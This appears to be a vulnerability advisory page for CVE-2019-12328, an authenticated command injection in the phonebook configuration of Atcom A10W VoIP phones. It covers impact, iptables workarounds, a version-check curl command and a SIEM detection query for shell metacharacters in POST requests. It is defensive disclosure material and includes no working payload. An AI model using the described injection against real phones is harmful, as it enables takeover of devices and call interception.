CVE-2019-12328 – This CVE allows authenticated attackers on the ... (How to Fix)

Q: What is the severity of CVE-2019-12328?

CVE-2019-12328 has a CVSS score of 9.0 (CRITICAL). This CVE allows authenticated attackers on the same network to execute arbitrary OS commands on Atcom A10W VoIP phones via shell metacharacters in POST requests to the remote phonebook configuration URI. The vulnerability stems from missing input validation in the web interface. Only Atcom A10W VoIP phones with specific firmware are affected.

📋 TL;DR

This CVE allows authenticated attackers on the same network to execute arbitrary OS commands on Atcom A10W VoIP phones via shell metacharacters in POST requests to the remote phonebook configuration URI. The vulnerability stems from missing input validation in the web interface. Only Atcom A10W VoIP phones with specific firmware are affected.

💻 Affected Systems

Products:

Atcom A10W VoIP Phone

Versions: Firmware 2.6.1a2421 (likely affects earlier versions too)

Operating Systems: Embedded Linux-based firmware

Default Config Vulnerable: ⚠️ Yes

Notes: Requires authenticated access to web interface. All default configurations with this firmware version are vulnerable.

📦 What is this software?

A10w Firmware by Atcom

View all CVEs affecting A10w Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full device compromise allowing attacker to install persistent backdoors, intercept calls, pivot to other network devices, or use the device as a botnet node.

🟠

Likely Case

Attacker gains shell access to modify phone configuration, intercept VoIP traffic, or disrupt phone services.

🟢

If Mitigated

Limited impact if network segmentation isolates VoIP devices and strong authentication is enforced.

🌐 Internet-Facing: LOW - Requires authenticated access and same network access, not directly internet exploitable.

🏢 Internal Only: HIGH - Any authenticated user on the internal network can exploit this to gain command execution.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authentication but is straightforward via crafted POST requests with shell metacharacters.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No official vendor advisory found

Restart Required: No

Instructions:

No official patch available. Check with Atcom for firmware updates. If unavailable, implement workarounds.

🔧 Temporary Workarounds

Network Segmentation

all

Isolate VoIP phones on separate VLAN to limit attack surface

Web Interface Access Control

linux

Restrict access to phone web interface to specific management IPs only

iptables -A INPUT -p tcp --dport 80 -s 192.168.1.100 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP

🧯 If You Can't Patch

Segment VoIP network from general corporate network
Implement strict firewall rules to limit phone management interface access

🔍 How to Verify

Check if Vulnerable:

Check firmware version via phone web interface > System Status. If version is 2.6.1a2421 or similar, assume vulnerable.

Check Version:

curl -u admin:password http://phone-ip/status.cgi | grep Firmware

Verify Fix Applied:

Test with controlled POST request containing shell metacharacters to phonebook configuration endpoint. If command execution fails, fix may be applied.

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to /phonebook configuration endpoints
Shell command execution in system logs
Multiple failed authentication attempts followed by successful login

Network Indicators:

POST requests to phone IPs containing shell metacharacters like ;, |, &, $()
Unexpected outbound connections from VoIP phones

SIEM Query:

source="voip-phones" AND (uri="*phonebook*" AND method="POST" AND (content="*;*" OR content="*|*" OR content="*$(*"))

📊 Metadata

CVE ID: CVE-2019-12328

CVSS v3 Score: 9.0 (CRITICAL)

CVSS Vector: CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE: CWE-78

Published: July 22, 2019

Last Updated: November 21, 2024

🔗 References

https://www.sit.fraunhofer.de/fileadmin/dokumente/CVE/Advisory_Atcom_A10W.pdf Exploit,Mitigation,Third Party Advisory
https://www.sit.fraunhofer.de/fileadmin/dokumente/CVE/Advisory_Atcom_A10W.pdf Exploit,Mitigation,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2019-12328, you might also want to check these: